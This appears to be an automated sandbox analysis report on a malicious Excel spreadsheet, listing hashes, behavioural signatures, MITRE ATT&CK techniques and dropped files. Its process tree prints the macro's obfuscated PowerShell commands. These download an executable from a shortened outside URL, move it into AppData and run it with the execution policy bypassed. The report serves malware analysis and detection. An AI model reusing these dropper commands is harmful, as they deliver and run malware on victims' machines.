7a89a04ff27d6fe5e0d9249feee09c24989b074aa75e5563f755a7a279c62e5e

General

Target

19b5bbd4478a50df5b886c7c9168ec59_JaffaCakes118.xls
Size

116KB
MD5

19b5bbd4478a50df5b886c7c9168ec59
SHA1

9c84634a5685ebe2f75b2b3eecffc7c2748bd621
SHA256

7a89a04ff27d6fe5e0d9249feee09c24989b074aa75e5563f755a7a279c62e5e
SHA512

637d9a59ef4ce4145ac1ebc6c5bcfcf202b8c20d9a55c90ea4add7cd9f57832f9859201b1d1716138877c2e42d00b5c1413212cc0ac61c92273c036325e18539
SSDEEP

3072:ZTk3hbdlylKsgqopeJBWhZFGkE+cL2NdAoioo1gaSNAPZlsWFPO7YiR6PJEcjjas:Fk3hbdlylKsgqopeJBWhZFVE+W2NdAos

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bit.ly/3djeHvo

Signatures

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	5092	5084	powershell.exe	81
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4036	5084	powershell.exe	81
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1484	5084	powershell.exe	81

Blocklisted process makes network request 1 IoCs

flow	pid	Process
22	1484	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5084	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1484	powershell.exe
5092	powershell.exe
4036	powershell.exe
5092	powershell.exe
1484	powershell.exe
4036	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeDebugPrivilege	4036	powershell.exe

Suspicious use of SetWindowsHookEx 14 IoCs

pid	Process
5084	EXCEL.EXE
5084	EXCEL.EXE
5084	EXCEL.EXE
5084	EXCEL.EXE
5084	EXCEL.EXE
5084	EXCEL.EXE
5084	EXCEL.EXE
5084	EXCEL.EXE
5084	EXCEL.EXE
5084	EXCEL.EXE
5084	EXCEL.EXE
5084	EXCEL.EXE
5084	EXCEL.EXE
5084	EXCEL.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 5084 wrote to memory of 1484	5084	EXCEL.EXE	86
PID 5084 wrote to memory of 1484	5084	EXCEL.EXE	86
PID 5084 wrote to memory of 4036	5084	EXCEL.EXE	87
PID 5084 wrote to memory of 4036	5084	EXCEL.EXE	87
PID 5084 wrote to memory of 5092	5084	EXCEL.EXE	88
PID 5084 wrote to memory of 5092	5084	EXCEL.EXE	88

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\19b5bbd4478a50df5b886c7c9168ec59_JaffaCakes118.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('https://bit.ly/3djeHvo','ts.exe')
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w 1 Start-Sleep 20; Move-Item "ts.exe" -Destination "${enV`:appdata}"
  2⤵
  - Process spawned unexpected child process
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w 1 -EP bypass Start-Sleep 25; cd ${enV`:appdata};.('.'+'/ts.exe')
  2⤵
  - Process spawned unexpected child process
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5092

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ac3bf9756600f6c31a15240716e6e7c6

SHA1
521aa76b55f74cafd1b579933dc0fae439acb0f5

SHA256
f7bc65b2962543bb5165f2b1bb6b3390ed3b55801475b2fd7701129cc8a081fd

SHA512
96ae0dddaeadae05fed313707076af5d443d328d2ea8524aa283812591b615b596a0aab1d2918471aba59f5546cebca7521bd2003db63a24f548899bee5fa67a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
331841fe482ffe8b1cc1509733d8ca67

SHA1
1e3257cca1b2c7c3aaf4cf1f138c9e9e665e8cb8

SHA256
14112a43248df71bdf7668c923f541190c6417ef37796605cf8114f565648d0f

SHA512
039e5991132912f94b3fbe23146ee61bb822aada6a3f2b37bca226c76c162e04a106f3626587ff079411a03e6e9a4813ad04813ada4694f9b78f49e1925389d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2tost5uc.czk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
77412068570786b3b167565843ed51c0

SHA1
3e77dd5a999218ca8f2914db57cea703fb05af4d

SHA256
0da0068fe5822318612bd28633616e373c92a5526dc19871c95c6e6d2706b52d

SHA512
8cf1e6b9513186a5be1064d965d18506994b22384214c9c87ccd6a519114a3ba5d2a24e107b77de1b5f07bfdc2687b08c02606389bba93bbd6371283bd525b0c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
3b9928fb5fb899c857490a8caa4df4d5

SHA1
3e7daf3c50263a4bea1616010d52dcc2d6ebf0d2

SHA256
cf8f4b7c0d3f43264f8688a0082fec6abc22b8f1f5eb4f2626481c01c8793dfe

SHA512
ad094cb1ed8e66a95a02d4949fbfd8640698181b18baf943ce5969b6c8b9ca1dcaf6bb06fe94b3dd5e49f60799d3a0fbaac230d90eb00cbe36aa069783752421

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
4d98da30393795581760a0736d3158ab

SHA1
79ab0bec6140a3dd05819cffd61c4d6fef6f77e7

SHA256
6e67ab3fedd56536bbdb97093de5ddbbeac5265661c516359415c29338c3823f

SHA512
474a6ab3d264e763a5ad90ef3ed0065d4d04e6e5b8ffbe4c3d84dcc1dda27f692e1dc5962e8c245ef76e42f4f71626f11b865cfcafce70e5a4314a1ddd41e1b1

Download Submit
memory/5084-8-0x00007FF94BB10000-0x00007FF94BB20000-memory.dmp

Filesize
64KB

Download
memory/5084-5-0x00007FF98DF4D000-0x00007FF98DF4E000-memory.dmp

Filesize
4KB

Download
memory/5084-9-0x00007FF98DEB0000-0x00007FF98E0A5000-memory.dmp

Filesize
2.0MB

Download
memory/5084-10-0x00007FF98DEB0000-0x00007FF98E0A5000-memory.dmp

Filesize
2.0MB

Download
memory/5084-11-0x00007FF98DEB0000-0x00007FF98E0A5000-memory.dmp

Filesize
2.0MB

Download
memory/5084-13-0x00007FF98DEB0000-0x00007FF98E0A5000-memory.dmp

Filesize
2.0MB

Download
memory/5084-12-0x00007FF98DEB0000-0x00007FF98E0A5000-memory.dmp

Filesize
2.0MB

Download
memory/5084-14-0x00007FF98DEB0000-0x00007FF98E0A5000-memory.dmp

Filesize
2.0MB

Download
memory/5084-15-0x00007FF98DEB0000-0x00007FF98E0A5000-memory.dmp

Filesize
2.0MB

Download
memory/5084-17-0x00007FF98DEB0000-0x00007FF98E0A5000-memory.dmp

Filesize
2.0MB

Download
memory/5084-16-0x00007FF94BB10000-0x00007FF94BB20000-memory.dmp

Filesize
64KB

Download
memory/5084-7-0x00007FF98DEB0000-0x00007FF98E0A5000-memory.dmp

Filesize
2.0MB

Download
memory/5084-6-0x00007FF98DEB0000-0x00007FF98E0A5000-memory.dmp

Filesize
2.0MB

Download
memory/5084-0-0x00007FF94DF30000-0x00007FF94DF40000-memory.dmp

Filesize
64KB

Download
memory/5084-4-0x00007FF94DF30000-0x00007FF94DF40000-memory.dmp

Filesize
64KB

Download
memory/5084-100-0x00007FF98DEB0000-0x00007FF98E0A5000-memory.dmp

Filesize
2.0MB

Download
memory/5084-3-0x00007FF94DF30000-0x00007FF94DF40000-memory.dmp

Filesize
64KB

Download
memory/5084-1-0x00007FF94DF30000-0x00007FF94DF40000-memory.dmp

Filesize
64KB

Download
memory/5084-79-0x00007FF98DEB0000-0x00007FF98E0A5000-memory.dmp

Filesize
2.0MB

Download
memory/5084-2-0x00007FF94DF30000-0x00007FF94DF40000-memory.dmp

Filesize
64KB

Download
memory/5084-96-0x00007FF94DF30000-0x00007FF94DF40000-memory.dmp

Filesize
64KB

Download
memory/5084-97-0x00007FF94DF30000-0x00007FF94DF40000-memory.dmp

Filesize
64KB

Download
memory/5084-99-0x00007FF94DF30000-0x00007FF94DF40000-memory.dmp

Filesize
64KB

Download
memory/5084-98-0x00007FF94DF30000-0x00007FF94DF40000-memory.dmp

Filesize
64KB

Download
memory/5092-38-0x0000027C6F990000-0x0000027C6F9B2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads